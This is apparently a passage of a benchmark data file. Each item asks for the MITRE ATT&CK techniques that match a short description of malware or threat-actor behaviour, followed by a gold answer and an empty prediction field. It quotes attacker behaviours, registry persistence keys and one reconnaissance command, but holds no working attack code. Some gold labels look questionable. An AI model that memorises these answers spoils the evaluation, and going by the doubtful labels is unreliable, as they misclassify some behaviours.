Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed during a Mandiant incident response in 2018 and, to date, solely utilized by APT34\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1555: Credentials from Password Stores\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: FIN6 has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP.\n\t - T1555: Credentials from Password Stores\n- Text: MuddyWater has performed credential dumping with LaZagne.\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n", + "input": "CosmicDuke collects user credentials, including passwords, for various programs including Web browsers.", + "gold": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Tropic Trooper's backdoor could list the infected system's installed software.\n\t - T1518: Software Discovery\n- Text: SDBbot can collected the country code of a compromised machine.\n\t - T1614: System Location Discovery\n- Text: Sandworm Team has exfiltrated internal documents, files, and other data from compromised hosts.\n\t - T1005: Data from Local System\n", + "input": "SideCopy has collected browser information from a compromised host.", + "gold": "- T1518: Software Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: For example, in the previous variant of BADNEWS, the victim\u2019s unique identifier was stored under a variable named \u2018uid\u2019, the username was stored in a variable named \u2018u\u2019, etc\n\t - T1033: System Owner/User Discovery\n- Text: Sandworm Team has used a tool to query Active Directory using LDAP, discovering information about usernames listed in AD.\n\t - T1087.002: Account Discovery - Domain Account\n- Text: SUNBURST collected a list of process names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists.\n\t - T1057: Process Discovery\n", + "input": "PowerDuke has commands to get the current user's name and SID.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Notably, one of the tools used in the attack exploited the CVE 2021 21551 vulnerability in a Dell driver in what was the first recorded abuse of this security flaw.\n\t - T1211: Exploitation for Defense Evasion\n\t - T1190: Exploit Public-Facing Application\n\t - T1588.006: Obtain Capabilities - Vulnerabilities\n- Text: Observed vulnerabilities include: CVE-2012-0158 CVE-2017-0199 CVE-2017-8759 CVE-2017-11882 Figure 2: APT40 attack lifecycle Establish Foothold APT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or used by other threat groups\n\t - T1203: Exploitation for Client Execution\n- Text: SVR target organisations who supply privileged software to intelligence targets.\n\t - T1195.002: Supply Chain Compromise - Compromise Software Supply Chain\n", + "input": "GOLD SOUTHFIELD has exploited Oracle WebLogic vulnerabilities for initial compromise.", + "gold": "- T1190: Exploit Public-Facing Application", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The SLUB backdoor is a custom one written in the C++ programming language, statically linking curl library to perform multiple HTTP requests. Other statically-linked libraries are boost (for extracting commands from gist snippets) and JsonCpp (for parsing slack channel communication).\n\t - T1587.001: Develop Capabilities - Malware\n- Text: Kimsuky has also used a Mac OS Python implant that gathers data from Mac OS systems and sends it to a C2 server (Command and Scripting Interpreter: Python [T1059.006]). The Python program downloads various implants based on C2 options specified after the filedown.php (see figure 4\n\t - T1071.003: Application Layer Protocol - Mail Protocols\n\t - T1059.006: Command and Scripting Interpreter - Python\n- Text: Lazarus Group has hosted custom and open-source tools on compromised as well as Lazarus Group-controlled servers.\n\t - T1608.002: Stage Capabilities - Upload Tool\n", + "input": "Lazarus Group has developed custom malware for use in their operations.", + "gold": "- T1587.001: Develop Capabilities - Malware", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Spark can collect the hostname, keyboard layout, and language from the system.\n\t - T1082: System Information Discovery\n- Text: No matching sample found for T1562.003\n- Text: No matching sample found for T1548.001\n", + "input": "Fysbis has used the command \"ls /etc | egrep -e\"fedora\\*|debian\\*|gentoo\\*|mandriva\\*|mandrake\\*|meego\\*|redhat\\*|lsb-\\*|sun-\\*|SUSE\\*|release\"\" to determine which Linux OS version is running.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Inception has used a reconnaissance module to identify active processes and other associated loaded modules.\n\t - T1057: Process Discovery\n- Text: In doing so, it will attempt to detect the following Anti-Virus products via various techniques: Trend Micro Kaspersky Symantec Avira AVG ALYac Ahnlab Ahnlab and ALYac are the most widely used Anti-Virus solutions in South Korea, and Trend Micro and the rest are also known to be most widely used in Taiwan\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: Remexi includes different modules that it deploys in its working directory, including configuration decryption and parsing, launching victim activity logging in a separate module, and seven threads for various espionage and auxiliary functions\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n\t - T1083: File and Directory Discovery\n", + "input": "ADVSTORESHELL can list running processes.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dyre has the ability to identify network settings on a compromised host.\n\t - T1016: System Network Configuration Discovery\n- Text: performs operating system information discovery using systeminfo.\n\t - T1082: System Information Discovery\n- Text: No matching sample found for T1557.002\n", + "input": "NanoCore gathers the IP address from the victim\u2019s machine.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Backdoor.Oldrea can use a network scanning module to identify ICS-related ports.\n\t - T1046: Network Service Discovery\n- Text: provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port.\n\t - T1205.001: Traffic Signaling - Port Knocking\n- Text: A variant can force the compromised system to function as a proxy server.\n\t - T1090: Proxy\n", + "input": "APT41 used a malware variant called WIDETONE to conduct port scans on specified subnets.", + "gold": "- T1046: Network Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Once a removable media device is inserted back into the first victim, USBStealer collects data from it that was exfiltrated from a second victim.\n\t - T1025: Data from Removable Media\n- Text: ESET researchers have discovered several previously undocumented post-compromise tools used by the highly active Gamaredon threat group in various malicious campaigns. One tool, a VBA macro targeting Microsoft Outlook, uses the target\u2019s email account to send spearphishing emails to contacts in the victim\u2019s Microsoft Office address book. We also analyzed further Gamaredon tools that have the ability to inject malicious macros and remote templates into existing Office documents\n\t - T1039: Data from Network Shared Drive\n\t - T1204.002: User Execution - Malicious File\n\t - T1534: Internal Spearphishing\n\t - T1083: File and Directory Discovery\n- Text: Zebrocy scans the system and automatically collects files with the following extensions: .doc, .docx, ,.xls, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .jpeg, .bmp, .tiff, .kum, .tlg, .sbx, .cr, .hse, .hsf, and .lhz.\n\t - T1119: Automated Collection\n", + "input": "CosmicDuke steals user files from removable media with file extensions and keywords that match a predefined list.", + "gold": "- T1025: Data from Removable Media", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: NOKKI can collect data from the victim and stage it in \"LOCALAPPDATA%\\MicroSoft Updatea\\uplog.tmp\".\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: Kessel can RC4-encrypt credentials before sending to the C2.\n\t - T1560: Archive Collected Data\n- Text: LoudMiner has set the attributes of the VirtualBox directory and VBoxVmService parent directory to \"hidden\".\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n", + "input": "MarkiRAT can store collected data locally in a created .nfo file.", + "gold": "- T1074.001: Data Staged - Local Data Staging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CCBkdr can use a DGA for Fallback Channels if communications with the primary command and control server are lost.\n\t - T1568.002: Dynamic Resolution - Domain Generation Algorithms\n- Text: 0x007CFABF video Desktop video recording 0x06E533C4 download Downloads executable and injects into new process 0x00684509 ammyy Ammyy Admin tool 0x07C6A8A5 update Updates self 0x0B22A5A7 Add/Update klgconfig (analysis incomplete) 0x0B77F949 httpproxy Starts HTTP proxy 0x07203363 killos Renders computer unbootable by wiping the MBR 0x078B9664 reboot Reboots the operating system 0x07BC54BC tunnel Creates a network tunnel 0x07B40571 adminka Adds new C2 server or proxy address for pseudo-HTTP protocol 0x079C9CC2 server Adds new C2 server for custom binary protocol 0x0007C9C2 user Creates or deletes Windows user account 0x000078B0 rdp Enables concurrent RDP (analysis incomplete) 0x079BAC85 secure Adds Notification Package (analysis incomplete) 0x00006ABC del Deletes file or service 0x0A89AF94 startcmd Adds command to the configuration file (see the Configuration section) 0x079C53BD runmem Downloads executable and injects directly into new process 0x0F4C3903 logonpasswords Send Windows accounts details to the C2 server 0x0BC205E4 screenshot Takes a screenshot of the desktop and sends it to the C2 server 0x007A2BC0 sleep Backdoor sleeps until specified date 0x0006BC6C dupl Unknown 0x04ACAFC3 Upload files to the C2 server 0x00007D43 vnc Runs VNC plugin 0x09C4D055 runfile Runs specified executable file 0x02032914 killbot Uninstalls backdoor 0x08069613 listprocess Returns list of running processes to the C2 server 0x073BE023 plugins Change C2 protocol used by plugins 0x0B0603B4 Download and execute shellcode from specified address 0x0B079F93 killprocess Terminates the first process found specified by name 0x00006A34 cmd Initiates a reverse shell to the C2 server 0x09C573C7 runplug Plugin control 0x08CB69DE autorun Updates backdoor Table 2: Supported Commands Configuration A configuration file resides in a file under the backdoor\u2019s installation directory with the .bin extension\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1105: Ingress Tool Transfer\n\t - T1008: Fallback Channels\n- Text: These websites hosted malware that would be side-loaded with a legitimate signed executable. These tactics are becoming increasingly common by malware authors in order to evade security products and controls. Two variants of the malware employed by C0d0so0 were discovered\u2014one that used HTTP for command and control (C2) communications, and one that used a custom network protocol over port 22\n\t - T1132.001: Data Encoding - Standard Encoding\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n", + "input": "Astaroth has used a DGA in C2 communications.", + "gold": "- T1568.002: Dynamic Resolution - Domain Generation Algorithms", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed during a Mandiant incident response in 2018 and, to date, solely utilized by APT34\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1555: Credentials from Password Stores\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: Magic Hound has stolen domain credentials by dumping LSASS process memory with comsvcs.dll and from a Microsoft Active Directory Domain Controller using Mimikatz.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control (C2) and operational infrastructure. The threat actors also integrate infrastructure they likely previously compromised for espionage purposes. For example, CTU researchers identified the group using IP addresses owned by several, presumably compromised, research organizations to interact with web shells in other target environments\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n", + "input": "Azorult can dump credentials from victim browsers.", + "gold": "- T1003: OS Credential Dumping", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic.\n\t - T1090.004: Proxy - Domain Fronting\n- Text: At first glance, these links generally cause less suspicion for the targets. After opening the links and several redirections, the victims are led to final phishing domains such as \u201cmobile[.]recover-session-service[.]site\u201d etc\n\t - T1583.001: Acquire Infrastructure - Domains\n- Text: APT29 has compromised domains to use for C2.\n\t - T1584.001: Compromise Infrastructure - Domains\n", + "input": "Milan can use hardcoded domains as an input for domain generation algorithms.", + "gold": "- T1568.002: Dynamic Resolution - Domain Generation Algorithms", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: S-Type may create a .lnk file to itself that is saved in the Start menu folder. It may also create the Registry key \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ IMJPMIJ8.1{3 characters of Unique Identifier}\".\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: The malware will setup the miner and then the miner will persist it in the system in two ways: 1) by adding itself as a service if the malware gains admin privileges or 2) by adding the batch file to the startup folder\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: If a victim meets certain criteria, T9000 uses the AppInit_DLL functionality to achieve persistence by ensuring that every user mode process that is spawned will load its malicious DLL, ResN32.dll. It does this by creating the following Registry keys: \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs \u2013 %APPDATA%\\Intel\\ResN32.dll\" and \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs \u2013 0x1\".\n\t - T1546.010: Event Triggered Execution - AppInit DLLs\n", + "input": "Some InnaputRAT variants establish persistence by modifying the Registry key \"HKU\\\\Software\\Microsoft\\Windows\\CurrentVersion\\Run:%appdata%\\NeutralApp\\NeutralApp.exe\".", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Conti can spread via SMB and encrypts files on different hosts, potentially compromising an entire network.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: Suckfly used legitimate account credentials that they dumped to navigate the internal victim network as though they were the legitimate account owner.\n\t - T1078: Valid Accounts\n- Text: Linux Rabbit brute forces SSH passwords in order to attempt to gain access and install its malware onto the server.\n\t - T1110.003: Brute Force - Password Spraying\n", + "input": "Fox Kitten has used valid accounts to access SMB shares.", + "gold": "- T1021.002: Remote Services - SMB/Windows Admin Shares", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobalt Group has added persistence by registering the file name for the next stage malware under \"HKCU\\Environment\\UserInitMprLogonScript\".\n\t - T1037.001: Boot or Logon Initialization Scripts - Logon Script (Windows)\n- Text: This specific key is set to point towards the path of the previously copied Cardinal RAT executable path. The executable will periodically query this registry key to ensure it is set appropriately. If the executable finds the registry key has been deleted, it will re-set it. The Load registry key acts as a persistence mechanism, ensuring that this Cardinal RAT executes every time a user logs on\n\t - T1112: Modify Registry\n- Text: This update to Emissary allowed the Trojan to run as a service. The configuration now contains settings for the Emissary service, which the Trojan will store in and access from the following registry keys:\n\t - T1574.011: Hijack Execution Flow - Services Registry Permissions Weakness\n", + "input": "DownPaper uses PowerShell to add a Registry Run key in order to establish persistence.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Frankenstein has run encoded commands from the command line.\n\t - T1027: Obfuscated Files or Information\n- Text: Sliver can use AES-GCM-256 to encrypt a session key for C2 message exchange.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: Capabilities of the NETWIRE backdoor include key logging, reverse shell, and password theft. The backdoor uses a custom encryption algorithm to encrypt data and then writes it to a file created in the ./LOGS directory\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", + "input": "Daserf uses encrypted Windows APIs and also encrypts data using the alternative base64+RC4 or the Caesar cipher.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KGH_SPY can collect information on installed applications.\n\t - T1518: Software Discovery\n- Text: attempts to detect several anti-virus products.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: Siloscape searches for kubectl.exe by name and the config file using a regular expression. The search function takes an extra argument: a pointer to a vector that holds folder names to exclude from the search\n\t - T1083: File and Directory Discovery\n", + "input": "BRONZE BUTLER has used tools to enumerate software installed on an infected host.", + "gold": "- T1518: Software Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dridex has collected a list of installed software on the system.\n\t - T1518: Software Discovery\n- Text: Mustang Panda has sent malicious files requiring direct victim interaction to execute.\n\t - T1204.002: User Execution - Malicious File\n- Text: Both MPK variants include key loggers that are extremely similar in functionality in addition to having the same strings used for headers within the key log file. The MPK IRC Bot monitors active application windows and writes the title of the open window along with the logged keystrokes to a file at \u201c%temp%\\Save.tmp\u201d. The MPK Trojan also monitors specifically for windows that are likely to contain login forms for popular web-based email clients, such as titles that contain:\n\t - T1554: Compromise Host Software Binary\n", + "input": "StrongPity has been executed via compromised installation files for legitimate software including compression applications, security software, browsers, file recovery applications, and other tools and utilities.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HDoor scans to identify open ports on the victim.\n\t - T1046: Network Service Discovery\n- Text: APT29 has conducted widespread scanning of target environments to identify vulnerabilities for exploit.\n\t - T1595.002: Active Scanning - Vulnerability Scanning\n- Text: smb and exploit in same sentence\n\t - T1210: Exploitation of Remote Services\n", + "input": "Leafminer scanned network services to search for vulnerabilities in the victim system.", + "gold": "- T1046: Network Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ZIRCONIUM has used the AES256 algorithm with a SHA1 derived key to decrypt exploit code.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: APT3 has used tools to compress data before exfilling it.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: Elderwood has delivered zero-day exploits and malware to victims via targeted emails containing malicious attachments.\n\t - T1566.001: Phishing - Spearphishing Attachment\n", + "input": "PipeMon can decrypt password-protected executables.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Higaisa\u2019s shellcode attempted to find the process ID of the current process.\n\t - T1057: Process Discovery\n- Text: KONNI can collect the username from the victim\u2019s machine.\n\t - T1033: System Owner/User Discovery\n- Text: Catchamas obtains application windows titles and then determines which windows to perform Screen Capture on.\n\t - T1010: Application Window Discovery\n", + "input": "AppleSeed can enumerate the current process on a compromised host.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PyDCrypt has attempted to execute with WMIC.\n\t - T1047: Windows Management Instrumentation\n- Text: In the first case, attackers create two WMI event filters and two WMI event consumers. The consumers are simply command lines launching base64-encoded PowerShell commands that load a large PowerShell script stored in the Windows registry. Figure 1 shows how the persistence is established\n\t - T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription\n- Text: Threat Group-3390 has used WinRM to enable remote execution.\n\t - T1021.006: Remote Services - Windows Remote Management\n", + "input": "Stealth Falcon malware gathers system information via Windows Management Instrumentation (WMI).", + "gold": "- T1047: Windows Management Instrumentation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: NETWIRE can discover and close windows on controlled systems.\n\t - T1010: Application Window Discovery\n- Text: In recent years, malware delivery mechanisms have changed from fixed media (diskettes) to email (e.g. the infamous LoveLetter email worm) and direct network attacks (e.g. CodeRed). The most recent step in the evolution process is a move to delivering malware via the world wide web.\n\t - T1102: Web Service\n- Text: These PowerShell scripts are final stage payloads \u2013 they include a downloader with domain generation algorithm (DGA) functionality and the backdoor component, which connect to the C2 server to receive commands and perform additional malicious activities. hUpdateCheckers.ps1 (POWRUNER) 